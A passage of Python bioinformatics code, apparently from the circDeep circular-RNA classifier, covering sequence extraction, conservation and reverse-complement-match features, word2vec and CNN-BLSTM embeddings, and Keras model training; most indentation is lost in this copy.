print('need to n-gram %d lines' % len(lines))
f = open(dest, 'w')
for num, line in enumerate(lines):
if num < 100000:
line = line[:-1].lower() # remove '\n' and lower ACGT
l = len(line) # length of line
for i in range(0, l, s):
if i + k >= l + 1:
break
f.write(''.join(line[i:i + k]))
f.write(' ')
f.write('\n')
f.close()
def word2vect(k, s, vector_dim, root_path, pos_sequences):
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
seq2ngram2(pos_sequences, k, s, 'seq_pos_' + str(k) + '_' + str(s) + '.txt')
sentences = LineSentence('seq_pos_' + str(k) + '_' + str(s) + '.txt')
mode1 = gensim.models.Word2Vec(sentences, iter=20, window=int(18 / s), min_count=50, size=vector_dim,
workers=multiprocessing.cpu_count())
mode1.save(root_path + 'word2vec_model' + '_' + str(k) + '_' + str(s) + '_' + str(vector_dim))
def build_class_file(num_pos, num_neg, class_file):
    with open(class_file, 'w') as outfile:
        outfile.write('label' + '\n')
        for i in range(num_pos):
            outfile.write('1' + '\n')
        for i in range(num_neg):
            outfile.write('0' + '\n')
def build_ACNN_BLSTM_model(k, s, vector_dim, root_path, MAX_LEN, pos_sequences, neg_sequences, seq_file, class_file,model_dir):
model1 = gensim.models.Word2Vec.load(
model_dir + 'word2vec_model' + '_' + str(k) + '_' + str(s) + '_' + str(vector_dim))
pos_list = seq2ngram(pos_sequences, k, s, 'seq_pos_' + str(k) + '_' + str(s) + '.txt', model1.wv)
with open(str(k) + '_' + str(s) + 'listpos.pkl', 'wb') as pickle_file:
pickle.dump(pos_list, pickle_file, protocol=pickle.HIGHEST_PROTOCOL)
# with open(str(k) + '_' + str(s) + 'listpos.pkl', 'rb') as f:
# pos_list = pickle.load(f)
# pos_list = pos_list[:250]
# print(str(len(pos_list)))
neg_list = seq2ngram(neg_sequences, k, s, 'seq_neg_' + str(k) + '_' + str(s) + '.txt', model1.wv)
with open(str(k) + '_' + str(s) + 'listneg.pkl', 'wb') as pickle_file:
pickle.dump(neg_list, pickle_file, protocol=pickle.HIGHEST_PROTOCOL)
# with open(str(k) + '_' + str(s) + 'listneg.pkl', 'rb') as f1:
# neg_list = pickle.load(f1)
# neg_list = neg_list[:200]
# print (str(len(neg_list)))
seqs = pos_list + neg_list
X = pad_sequences(seqs, maxlen=MAX_LEN)
y = np.array([1] * len(pos_list) + [0] * len(neg_list))
build_class_file(len(pos_list), len(neg_list), class_file)
X1 = X
n_seqs = len(seqs)
indices = np.arange(n_seqs)
np.random.shuffle(indices)
X = X[indices]
y = y[indices]
n_tr = int(n_seqs * 0.8)
X_train = X[:n_tr]
y_train = y[:n_tr]
X_valid = X[n_tr:]
y_valid = y[n_tr:]
embedding_matrix = np.zeros((len(model1.wv.vocab), vector_dim))
for i in range(len(model1.wv.vocab)):
embedding_vector = model1.wv[model1.wv.index2word[i]]
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(input_dim=embedding_matrix.shape[0],
output_dim=embedding_matrix.shape[1],
weights=[embedding_matrix],
input_length=MAX_LEN,
trainable=True))
model.add(Dropout(0.1))
# model.add(Convolution1D(nb_filter = 100,filter_length=1,activation='relu',border_mode = 'valid'))
model.add(Convolution1D(nb_filter=100,
filter_length=7,
activation='relu',
border_mode='valid'))
model.add(MaxPooling1D(4, 4))
model.add(Dropout(0.1))
# model.add(Convolution1D(nb_filter = 80,filter_length=1,activation='relu',border_mode = 'valid'))
model.add(Convolution1D(100, 1, activation='relu'))
model.add(MaxPooling1D(2, 2))
model.add(Dropout(0.1))
model.add(Bidirectional(LSTM(100, consume_less='gpu')))
model.add(Dropout(0.1))
model.add(Dense(80, activation='relu'))
model.add(Dropout(0.1))
model.add(Dense(20, activation='relu', name='myfeatures'))
model.add(Dropout(0.1))
model.add(Dense(1, activation='sigmoid'))
sgd = optimizers.SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='mean_squared_error', optimizer=sgd, metrics=['accuracy'])
print(model.summary())
# model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
# print(model.summary())
checkpointer = ModelCheckpoint(
filepath=model_dir+'bestmodel_ACNN_BLSTM_' + str(k) + ' ' + str(s) + ' ' + str(vector_dim) + str(MAX_LEN) + '.hdf5',
verbose=1,
save_best_only=True)
earlystopper = EarlyStopping(monitor='val_loss', patience=6, verbose=1)
print('Training model...')
history = model.fit(X_train, y_train, nb_epoch=2, batch_size=128, shuffle=True,
validation_data=(X_valid, y_valid),
callbacks=[checkpointer, earlystopper],
verbose=1)
# print(history.history.keys())
# summarize history for accuracy
# plt.figure()
# plt.plot(history.history['acc'])
# plt.plot(history.history['val_acc'])
# plt.title('model accuracy')
# plt.ylabel('accuracy')
# plt.xlabel('epoch')
# plt.legend(['train', 'test'], loc='upper left')
# plt.savefig('C:/Users/mohamed/Documents/text_mining/finaldata/myaccuracy-drop='+str(int(ls*10))+'s='+str(s)+'vectrdim='+str(vector_dim))
# summarize history for loss
# plt.figure()
# plt.plot(history.history['loss'])
# plt.plot(history.history['val_loss'])
# plt.title('model loss')
# plt.ylabel('loss')
# plt.xlabel('epoch')
# plt.legend(['train', 'test'], loc='upper left')
# plt.savefig('C:/Users/mohamed/Documents/text_mining/finaldata/myloss-drop='+str(int(ls*10))+'s='+str(s)+'vectrdim='+str(vector_dim))
# tresults = model.evaluate(X_test, y_test)
# print (tresults)
# y_pred = model.predict(X_test, batch_size=32, verbose=1)
# y = y_test
# print ('Calculating AUC...')
# auroc = metrics.roc_auc_score(y, y_pred)
# auprc = metrics.average_precision_score(y, y_pred)
# print (auroc, auprc)
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer('myfeatures').output)
np.savetxt(seq_file, intermediate_layer_model.predict(X1), delimiter=" ")
def extract_ACNN_BLSTM(k, s, vector_dim, root_path, MAX_LEN, testing_sequences, seq_file,model_dir):
model1 = gensim.models.Word2Vec.load(
model_dir + 'word2vec_model' + '_' + str(k) + '_' + str(s) + '_' + str(vector_dim))
seqs = seq2ngram(testing_sequences, k, s, 'seq_' + str(k) + '_' + str(s) + '.txt', model1.wv)
X = pad_sequences(seqs, maxlen=MAX_LEN)
model = load_model(model_dir+'bestmodel_ACNN_BLSTM_' + str(k) + ' ' + str(s) + ' ' + str(vector_dim) + str(MAX_LEN) + '.hdf5')
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer('myfeatures').output)
np.savetxt(seq_file, intermediate_layer_model.predict(X), delimiter=" ")
def bigwig_score_list(bw, chr, start, end):
score = []
kk = bw.intervals(chr, start, end)
if kk != None:
for t in bw.intervals(chr, start, end):
score.append(t[2])
if len(score) == 0:
for i in range(start, end):
score.append(0)
return score
def bigwig_mean(bw, chr, start, end):
score_sum = 0
mean_score = 0
kk = bw.intervals(chr, start, end)
if kk != None:
for t in bw.intervals(chr, start, end):
score_sum += t[2]
else:
print('yes')
if (end - start) != 0:
mean_score = score_sum / (end - start)
else:
mean_score = 0
return mean_score
def extract_exons(gtf_file):
gtf = open(gtf_file, 'r');
exons = defaultdict(list)
for line in gtf: ## process each line
if line[0] != '#':
ele = line.strip().split('\t');
if len(ele) > 7:
if ele[2] == 'exon':
chr = (ele[0])
strand = (ele[6])
start = int(ele[3])
end = int(ele[4])
exons[chr + strand].append([start, end])
return exons
def get_processed_conservation_score(score_whole_seq, thres):
ls = len(score_whole_seq)
score_array = np.array(score_whole_seq)
con_arr = (score_array >= thres)
con_str = ''
for val in con_arr:
if val:
con_str = con_str + '1'
else:
con_str = con_str + '0'
sat8_len = con_str.count('11111111')
sat7_len = con_str.count('1111111')
sat_6len = con_str.count('111111')
sat5_len = con_str.count('11111')
return float(sat5_len) * 1000 / ls, float(sat_6len) * 1000 / ls, float(sat7_len) * 1000 / ls, float(
sat8_len) * 1000 / ls
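# Example (hypothetical scores): for score_whole_seq = [0.9] * 8 + [0.1] * 2 and thres = 0.5
# the binarised string is '1111111100'; str.count() counts non-overlapping occurrences, so
# each of '11111', '111111', '1111111' and '11111111' is found once and the function returns
# (100.0, 100.0, 100.0, 100.0) after scaling by 1000 / len(score_whole_seq).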
def point_overlap(min1, max1, min2, max2):
return max(0, min(max1, max2) - max(min1, min2))
def extract_feature_conservation_CCF(fasta_file, bigwig, gtf_file, out):
fp = open(fasta_file, 'r')
bw = pyBigWig.open(bigwig)
exons = extract_exons(gtf_file)
fw = open(out, 'w')
ii = 0
for line in fp:
ii = ii + 1
ele = line.strip().split(' ')
chr_name = ele[0]
start = int(ele[1])
end = int(ele[2]) - 1
strand = ele[3]
list_all_exons = exons[chr_name + strand]
list_exons = []
score = []
tt = True
for i in range(len(list_all_exons)):
start_exon = list_all_exons[i][0]
end_exon = list_all_exons[i][1]
if point_overlap(start_exon, end_exon, start, end):
for i in range(len(list_exons)):
if list_exons[i][0] == start_exon and list_exons[i][1] == end_exon:
tt = False
if tt:
list_exons.append((start_exon, end_exon))
b = []
for begin, end in sorted(list_exons):
if b and b[-1][1] >= begin - 1:
b[-1][1] = max(b[-1][1], end)
else:
b.append([begin, end])
list_exons = b
if len(list_exons) == 0:
list_exons.append([start, end])
for i in range(len(list_exons)):
score.append(bigwig_mean(bw, chr_name, list_exons[i][0], list_exons[i][1]))
score_array = np.array(score)
mean_score = score_array.mean()
max_score = score_array.max()
median_score = np.median(score_array)
fw.write(str(mean_score) + ' ' + str(max_score) + ' ' + str(
median_score))
score_whole_seq = bigwig_score_list(bw, chr_name, start, end)
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.5)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.6)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.7)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.8)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.9)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
fw.write('\n')
fp.close()
bw.close()
def complement(seq):
complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
complseq = [complement[base] for base in seq]
return complseq
def reverse_complement(seq):
seq = list(seq)
seq.reverse()
return ''.join(complement(seq))
def bed_to_fasta(bed_file, fasta_file, sequence_file, genome_fasta):
bed = open(bed_file, 'r');
output = open(fasta_file, 'w');
output2 = open(sequence_file, 'w');
genome_fa = pysam.FastaFile(genome_fasta)
for line in bed:
values = line.split()
chr_n = values[0]
start = int(values[1])
end = int(values[2])
strand = values[3]
seq = genome_fa.fetch(chr_n, start, end)
seq = seq.upper()
if strand == '-':
seq = reverse_complement(seq)
        output.write('>' + ':'.join([chr_n, str(start), str(end), strand]) + '\n')
        output.write(seq + '\n')
        output2.write(seq + '\n')
    bed.close()
    output.close()
    output2.close()
def extract_rcm(fasta_file, genome, out, kk, jj):
genome_fa = pysam.FastaFile(genome)
fp = open(fasta_file, 'r')
fw = open(out, 'w')
indices, number_kmers = get_dictionary_kmers(jj)
numline = 0
for line in fp:
ele = line.strip().split(':')
if line[0] == '>':
numline = numline + 1
if numline % 10 == 0:
print('%d lines made' % numline)
chr_name = ele[0][1:]
start = int(ele[1])
end = int(ele[2]) - 1
strand = ele[3]
scores = get_rcm_score(chr_name, strand, start, end, genome_fa, kk, jj, indices, number_kmers)
for jjj in range(len(scores)):
fw.write(str(scores[jjj]) + ' ')
fw.write('\n')
def extract_rcm2(fasta_file, genome, out, kk, jj):
genome_fa = pysam.FastaFile(genome)
fp = open(fasta_file, 'r')
fw = open(out, 'w')
indices, number_kmers = get_dictionary_kmers(jj)
numline = 0
for line in fp:
ele = line.strip().split(':')
if line[0] == '>':
numline = numline + 1
if numline % 10 == 0:
print('%d lines made' % numline)
chr_name = ele[0][1:]
start = int(ele[1])
end = int(ele[2]) - 1
strand = ele[3]
scores = get_rcm_score2(chr_name, strand, start, end, genome_fa, kk, jj, indices, number_kmers)
for jjj in range(len(scores)):
fw.write(str(scores[jjj]) + ' ')
fw.write('\n')
def match_score(alpha, beta):
match_award = 12
mismatch_penalty = -2
if alpha == beta:
return match_award
else:
return mismatch_penalty
def zeros(shape):
retval = []
for x in range(shape[0]):
retval.append([])
for y in range(shape[1]):
retval[-1].append(0)
return retval
def water(seq1, seq2):
m, n = len(seq1) - 1, len(seq2) - 1 # length of two sequences
# Generate DP table and traceback path pointer matrix
score = zeros((m + 1, n + 1)) # the DP table
pointer = zeros((m + 1, n + 1)) # to store the traceback path
max_score_500 = 0
max_score_750 = 0
max_score_1000 = 0
max_score_1250 = 0
# initial maximum score in DP table
# Calculate DP table and mark pointers
gap_penalty = -12
for i in range(1, min(m + 1, 1250)):
for j in range(1, min(n + 1, 1250)):
score_diagonal = score[i - 1][j - 1] + match_score(seq1[i], seq2[j]);
score[i][j] = max(0, score_diagonal)
if score[i][j] >= max_score_500 and i <= 500 and j <= 500:
max_score_500 = score[i][j];
if score[i][j] >= max_score_750 and i <= 750 and j <= 750:
max_score_750 = score[i][j];
if score[i][j] >= max_score_1000 and i <= 1000 and j <= 1000:
max_score_1000 = score[i][j];
if score[i][j] >= max_score_1250 and i <= 1250 and j <= 1250:
max_score_1250 = score[i][j];
return [max_score_500, max_score_750, max_score_1000, max_score_1250]
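# Note on water() above: only the diagonal move is scored (gap_penalty is defined but never
# used), so it effectively reports the best ungapped local match score between the two index
# sequences (match = +12, mismatch = -2, scores clipped at 0), evaluated within windows of the
# first 500, 750, 1000 and 1250 positions of each sequence.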
def get_rcm_score(chrr, strand, start, end, genome_fa, wsize, motifsize, indices, number_kmers):
fi_seq = genome_fa.fetch(chrr, start - wsize, start).upper()
si_seq = genome_fa.fetch(chrr, end, end + wsize).upper()
if strand == '-':
fi_seq = reverse_complement(fi_seq)
si_seq = reverse_complement(si_seq)
fi_seq_ind = sequence_to_indices(fi_seq, indices, motifsize)
fsi_seq_ind = sequence_to_indices_rc(si_seq, indices, motifsize)
results = water(fi_seq_ind, fsi_seq_ind)
return results
def get_rcm_score2(chrr, strand, start, end, genome_fa, wsize, motifsize, indices, number_kmers):
fi_seq = genome_fa.fetch(chrr, start - wsize, start).upper()
si_seq = genome_fa.fetch(chrr, end, end + wsize).upper()
if strand == '-':
fi_seq = reverse_complement(fi_seq)
si_seq = reverse_complement(si_seq)
fi_seq_ind = sequence_to_indices(fi_seq, indices, motifsize)
fsi_seq_ind = sequence_to_indices_rc(si_seq, indices, motifsize)
results2 = []
for size in [500, 750, 1000, 1250, 1500, 1750, 1990]:
results2.append(absolute_number_rcm(fi_seq_ind[:size], fsi_seq_ind[2000 - size:], number_kmers))
# ss=extract_absolute_number_rcm(fi_seq_ind,fsi_seq_ind):
return results2
def absolute_number_rcm(fi_seq_ind, fsi_seq_ind, end):
sum = 0
for i in range(end):
sum = sum + min(fi_seq_ind.count(i), fsi_seq_ind.count(i))
return sum
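# Note on absolute_number_rcm() above: for every k-mer index it takes the minimum of the
# occurrence counts in the upstream flank and in the reverse-complement-encoded downstream
# flank and sums them, i.e. it counts k-mer occurrences that can be paired across the flanks.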
def sequence_to_indices(sequence, indices, k):
seq_list = []
for i in range(len(sequence) - k):
seq_list.append(indices[sequence[i:i + k]])
return seq_list
def sequence_to_indices_rc(sequence, indices, k):
seq_list = []
for i in range(len(sequence) - k):
seq_list.append(indices[reverse_complement(sequence[i:i + k])])
return seq_list
def get_dictionary_kmers(k):
indices = defaultdict(int)
chars = ['A', 'C', 'G', 'T']
base = len(chars)
end = len(chars) ** k
for i in range(0, end):
seq = ''
n = i
for j in range(k):
seq = seq + chars[n % base]
n = int(n / base)
indices[seq] = i
return indices, end
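# Example (k=2): get_dictionary_kmers(2) returns the 16 dinucleotides with indices assigned
# least-significant base first, e.g. 'AA' -> 0, 'CA' -> 1, 'GA' -> 2, 'TA' -> 3, 'AC' -> 4, ...
# Because indices is a defaultdict(int), any k-mer that was not enumerated (for instance one
# containing 'N') silently maps to index 0.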
def extract_rcm_features(pos_data_fasta, neg_data_fasta, genome, rcm_file, data_dir):
if not os.path.exists(data_dir + 'rcm/'):
os.makedirs(data_dir + 'rcm/')
proc = []
for k in [1, 2, 3]:
out = data_dir + 'rcm/pos_rcm1_' + str(k)
print(str(k))
p = Process(target=extract_rcm, args=(pos_data_fasta, genome, out, 1250, k))
proc.append(p)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p in proc:
p.start()
proc2 = []
for k in [1, 2, 3]:
out = data_dir + 'rcm/neg_rcm1_' + str(k)
print(str(k))
p2 = Process(target=extract_rcm, args=(neg_data_fasta, genome, out, 1250, k))
proc2.append(p2)
# extract_rcm(pos_data_fasta, genome, out, 1000, k)
for p2 in proc2:
p2.start()
proc3 = []
for k in [3, 4, 5, 6]:
out = data_dir + 'rcm/pos_rcm2_' + str(k)
print(str(k))
p3 = Process(target=extract_rcm2, args=(pos_data_fasta, genome, out, 2000, k))
proc3.append(p3)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p3 in proc3:
p3.start()
proc4 = []
for k in [3, 4, 5, 6]:
out = data_dir + 'rcm/neg_rcm2_' + str(k)
print(str(k))
p4 = Process(target=extract_rcm2, args=(neg_data_fasta, genome, out, 2000, k))
proc4.append(p4)
# extract_rcm(pos_data_fasta, genome, out, 1000, k)
for p4 in proc4:
p4.start()
for p in proc:
p.join()
for p2 in proc2:
p2.join()
for p3 in proc3:
p3.join()
for p4 in proc4:
p4.join()
concatenate_rcm_files(rcm_file, data_dir)
def concatenate_rcm_files(rcm_file, data_dir):
file_dir = data_dir + 'rcm/'
root_range = [1, 2]
K_range = {1: [1, 2, 3],
2: [3, 4, 5, 6]}
    # dict to store the data as the files are read out
lines = {'pos': list(), 'neg': list(), 'header': ""}
def append_data(filename, column_prefix, sign):
"""
take each line from file, and append that line to
respective string in lines[sign]
"""
with open(os.path.join(file_dir, filename)) as f:
# initialize the lines list if first time
new_lines = f.readlines()
if len(lines[sign]) == 0:
lines[sign] = ["" for _ in range(len(new_lines))]
# append every line to lines
last_line = str()
for i, (line, new_data) in enumerate(zip(lines[sign], new_lines)):
lines[sign][i] += new_data.strip() + ' '
last_line = new_data.strip()
# append headers
if sign == 'pos':
for i in range(len(last_line.split(' '))):
lines['header'] += column_prefix + '_' + str(i + 1) + ' '
    # iterate through all file names and call append_data on each
for root in root_range:
for K in K_range[root]:
for sign in ['pos', 'neg']:
column_prefix = str(root) + '_' + str(K)
filename = sign + '_rcm' + column_prefix
print(filename)
append_data(filename, column_prefix, sign)
    # write the combined feature matrix to rcm_file
with open(rcm_file, 'w') as outfile:
outfile.write(lines['header'] + '\n')
for line in lines['pos']:
outfile.write(line + '\n')
for line in lines['neg']:
outfile.write(line + '\n')
def extract_rcm_features_testing(data_fasta, genome, rcm_file, data_dir):
if not os.path.exists(data_dir + 'rcm/'):
os.makedirs(data_dir + 'rcm/')
proc = []
for k in [1, 2, 3]:
out = data_dir + 'rcm/rcm1_' + str(k)
p = Process(target=extract_rcm, args=(data_fasta, genome, out, 1250, k))
proc.append(p)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p in proc:
p.start()
proc3 = []
for k in [3, 4, 5, 6]:
out = data_dir + 'rcm/rcm2_' + str(k)
print(str(k))
p3 = Process(target=extract_rcm2, args=(data_fasta, genome, out, 2000, k))
proc3.append(p3)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p3 in proc3:
p3.start()
for p in proc:
p.join()
for p3 in proc3:
p3.join()
print('start concatenate')
concatenate_rcm_files_testing(rcm_file, data_dir)
def concatenate_rcm_files_testing(rcm_file, data_dir):
file_dir = data_dir + 'rcm/'
root_range = [1, 2]
K_range = {1: [1, 2, 3],
2: [3, 4, 5, 6]}
    # dict to store the data as the files are read out
lines = {'data': list(), 'header': ""}
def append_data(filename, column_prefix, sign='data'):
"""
take each line from file, and append that line to
respective string in lines[sign]
"""
with open(os.path.join(file_dir, filename)) as f:
# initialize the lines list if first time
new_lines = f.readlines()
if len(lines[sign]) == 0:
lines[sign] = ["" for _ in range(len(new_lines))]
# append every line to lines
last_line = str()
for i, (line, new_data) in enumerate(zip(lines[sign], new_lines)):
lines[sign][i] += new_data.strip() + ' '
last_line = new_data.strip()
# append headers
if sign == 'data':
for i in range(len(last_line.split(' '))):
lines['header'] += column_prefix + '_' + str(i + 1) + ' '
    # iterate through all file names and call append_data on each
for root in root_range:
for K in K_range[root]:
column_prefix = str(root) + '_' + str(K)
filename = 'rcm' + column_prefix
print(filename)
append_data(filename, column_prefix, 'data')
    # write the combined feature matrix to rcm_file
with open(rcm_file, 'w') as outfile:
outfile.write(lines['header'] + '\n')
for line in lines['data']:
outfile.write(line + '\n')
def concatenate_cons_files(pos_conservation_feature_file, neg_conservation_feature_file, cons_file):
filenames = [pos_conservation_feature_file, neg_conservation_feature_file]
with open(cons_file, 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
outfile.write(infile.read())
def extract_features_testing(testing_bed, genome, bigwig, gtf, data_dir,model_dir):
cons_file = data_dir + 'conservation_features_test.txt'
rcm_file = data_dir + 'rcm_features_test.txt'
seq_file = data_dir + 'seq_features_test.txt'
testing_fasta = testing_bed + '.fasta'
testing_sequences = testing_bed + '.seq.txt'
bed_to_fasta(testing_bed,testing_fasta ,testing_sequences, genome)
extract_feature_conservation_CCF(testing_bed, bigwig, gtf, cons_file)
extract_rcm_features_testing(testing_fasta, genome,rcm_file,data_dir)
extract_ACNN_BLSTM(3, 1, 40, data_dir, 8000, testing_sequences, seq_file,model_dir)
return testing_fasta, testing_sequences, cons_file, rcm_file, seq_file
def extract_features_training(pos_data_bed, neg_data_bed, genome, bigwig, gtf, data_dir,model_dir):
cons_file = data_dir + 'conservation_features.txt'
rcm_file = data_dir + 'rcm_features.txt'
seq_file = data_dir + 'seq_features.txt'
class_file = data_dir + 'class.txt'
pos_data_fasta = pos_data_bed + '.fasta'
pos_sequences = pos_data_bed + '.seq.txt'
neg_data_fasta = neg_data_bed + '.fasta'
neg_sequences = neg_data_bed + '.seq.txt'
pos_conservation_feature_file = pos_data_bed + '.cons'
neg_conservation_feature_file = neg_data_bed + '.cons'
bed_to_fasta(pos_data_bed,pos_data_fasta ,pos_sequences, genome)
bed_to_fasta(neg_data_bed, neg_data_fasta,neg_sequences, genome)
extract_feature_conservation_CCF(neg_data_bed, bigwig, gtf, neg_conservation_feature_file)
extract_feature_conservation_CCF(pos_data_bed, bigwig,gtf,pos_conservation_feature_file)
concatenate_cons_files(pos_conservation_feature_file,neg_conservation_feature_file,cons_file)
extract_rcm_features(pos_data_fasta, neg_data_fasta, genome,rcm_file,data_dir)
word2vect(3, 1, 40, model_dir, pos_sequences)
    print('word2vec model trained; extracting ACNN-BLSTM sequence features')
build_ACNN_BLSTM_model(3, 1, 40, data_dir, 8000, pos_sequences, neg_sequences, seq_file, class_file,model_dir)
    print('ACNN-BLSTM sequence features written to ' + seq_file)
return pos_data_fasta, pos_sequences, neg_data_fasta, neg_sequences, cons_file, rcm_file, seq_file
def load_data(path, seq=True, rcm=True, cons=False, test=False, cons_file=None, rcm_file=None, seq_file=None):
"""
Load data matrices from the specified folder.
"""
data = dict()
if seq: data["seq"] = np.loadtxt(seq_file, delimiter=' ', skiprows=0)
if rcm: data["rcm"] = np.loadtxt(rcm_file, skiprows=1)
if cons: data["cons"] = np.loadtxt(cons_file, skiprows=0)
if test:
data["Y"] = []
else:
data["Y"] = np.loadtxt(path + 'class.txt', skiprows=1)
print('data loaded')
return data
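# Example call (file names follow the defaults built in train_circDeep; adjust as needed):
#   data = load_data('data/', seq=True, rcm=True, cons=True, test=False,
#                    cons_file='data/conservation_features.txt',
#                    rcm_file='data/rcm_features.txt',
#                    seq_file='data/seq_features.txt')
#   # data["seq"], data["rcm"], data["cons"] are feature matrices, data["Y"] the class labels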
def split_training_validation(classes, validation_size=0.2, shuffle=False):
"""split sampels based on balnace classes"""
num_samples = len(classes)
classes = np.array(classes)
classes_unique = np.unique(classes)
num_classes = len(classes_unique)
indices = np.arange(num_samples)
# indices_folds=np.zeros([num_samples],dtype=int)
training_indice = []
training_label = []
validation_indice = []
validation_label = []
print(str(classes_unique))
for cl in classes_unique:
indices_cl = indices[classes == cl]
num_samples_cl = len(indices_cl)
        # split this class into training and validation parts
if shuffle:
random.shuffle(indices_cl) # in-place shuffle
        # number of validation samples and the remaining training samples
num_samples_validation = int(num_samples_cl * validation_size)
res = num_samples_cl - num_samples_validation
training_indice = training_indice + [val for val in indices_cl[num_samples_validation:]]
training_label = training_label + [cl] * res
validation_indice = validation_indice + [val for val in indices_cl[:num_samples_validation]]
validation_label = validation_label + [cl] * num_samples_validation
training_index = np.arange(len(training_label))
random.shuffle(training_index)
training_indice = np.array(training_indice)[training_index]
training_label = np.array(training_label)[training_index]
validation_index = np.arange(len(validation_label))
random.shuffle(validation_index)
validation_indice = np.array(validation_indice)[validation_index]
validation_label = np.array(validation_label)[validation_index]
print(np.shape(training_indice))
print(np.shape(training_label))
print(np.shape(validation_indice))
print(np.shape(validation_label))
return training_indice, training_label, validation_indice, validation_label
def preprocess_data(X, scaler=None, stand=False):
if not scaler:
if stand:
scaler = StandardScaler()
else:
scaler = MinMaxScaler()
scaler.fit(X)
X = scaler.transform(X)
return X, scaler
def preprocess_labels(labels, encoder=None, categorical=True):
if not encoder:
encoder = LabelEncoder()
encoder.fit(labels)
y = encoder.transform(labels).astype(np.int32)
if categorical:
y = np_utils.to_categorical(y)
return y, encoder
def get_rnn_fea(train, sec_num_hidden=128, num_hidden=128):
model = Sequential()
# model.add(Dense(num_hidden, input_dim=train.shape[1], activation='relu'))
model.add(Dense(num_hidden, input_shape=(train.shape[1],), activation='relu'))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(num_hidden, input_dim=num_hidden, activation='relu'))
# model.add(Dense(num_hidden, input_shape=(num_hidden,), activation='relu'))
model.add(PReLU())
model.add(BatchNormalization())
# model.add(Activation('relu'))
model.add(Dropout(0.5))
return model
def train_circDeep(data_dir, model_dir, genome, bigwig, gtf, positive_bed, negative_bed, seq=True, rcm=True, cons=True,extract_features=True):
if extract_features:
pos_data_fasta, pos_sequences, neg_data_fasta, neg_sequences, cons_file, rcm_file, seq_file = extract_features_training(
positive_bed, negative_bed, genome, bigwig, gtf, data_dir,model_dir)
else:
cons_file = data_dir + 'conservation_features.txt'
rcm_file = data_dir + 'rcm_features.txt'
seq_file = data_dir + 'seq_features.txt'
training_data = load_data(data_dir, seq, rcm, cons, False, cons_file, rcm_file, seq_file)
print('training', len(training_data))
seq_hid = 20
rcm_hid = 256
cons_hid = 64
training_indice, training_label, validation_indice, validation_label = split_training_validation(training_data["Y"])
print('split done')
if seq:
print(np.shape(training_data["seq"]))
seq_data, seq_scaler = preprocess_data(training_data["seq"])
print(np.shape(seq_data))
joblib.dump(seq_scaler, os.path.join(model_dir, 'seq_scaler.pkl'))
seq_train = seq_data[training_indice]
seq_validation = seq_data[validation_indice]
seq_net = get_rnn_fea(seq_train, sec_num_hidden=seq_hid, num_hidden=seq_hid * 2)
seq_data = []
training_data["seq"] = []
if rcm:
rcm_data, rcm_scaler = preprocess_data(training_data["rcm"])
joblib.dump(rcm_scaler, os.path.join(model_dir, 'rcm_scaler.pkl'))
rcm_train = rcm_data[training_indice]
rcm_validation = rcm_data[validation_indice]
rcm_net = get_rnn_fea(rcm_train, sec_num_hidden=rcm_hid, num_hidden=rcm_hid * 3)
rcm_data = []
training_data["rcm"] = []
if cons:
cons_data, cons_scaler = preprocess_data(training_data["cons"])
joblib.dump(cons_scaler, os.path.join(model_dir, 'cons_scaler.pkl'))
cons_train = cons_data[training_indice]
cons_validation = cons_data[validation_indice]
cons_net = get_rnn_fea(cons_train, sec_num_hidden=cons_hid, num_hidden=cons_hid * 3)
cons_data = []
training_data["cons"] = []
y, encoder = preprocess_labels(training_label)
val_y, encoder = preprocess_labels(validation_label, encoder=encoder)
training_data.clear()
model = Sequential()
training_net = []
training = []
validation = []
total_hid = 0
if seq:
training_net.append(seq_net)
training.append(seq_train)
validation.append(seq_validation)
total_hid = total_hid + seq_hid
seq_train = []
seq_validation = []
if rcm:
training_net.append(rcm_net)
training.append(rcm_train)
validation.append(rcm_validation)
total_hid = total_hid + rcm_hid
rcm_train = []
rcm_validation = []
if cons:
training_net.append(cons_net)
training.append(cons_train)
validation.append(cons_validation)
total_hid = total_hid + cons_hid
cons_train = []
cons_validation = []
#model.add(concatenate(training_net))
model.add(Merge(training_net, mode='concat'))
model.add(Dropout(0.2))
model.add(Dense(2, input_shape=(total_hid,)))
model.add(Activation('softmax'))
# sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
# model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
sgd = optimizers.SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='mean_squared_error', optimizer=sgd, metrics=['accuracy'])
print(model.summary())
# checkpointer = ModelCheckpoint(filepath='bestmodel_circDeep.hdf5', verbose=1, save_best_only=True)
earlystopper = EarlyStopping(monitor='val_loss', patience=5, verbose=1)
print('model training')
model.fit(training, y, batch_size=128, nb_epoch=15, verbose=1, validation_data=(validation, val_y),
callbacks=[earlystopper])
model.save(os.path.join(model_dir, 'bestmodel_circDeep.pkl'))
#joblib.dump(model, os.path.join(model_dir,'bestmodel_circDeep.pkl'))
return model
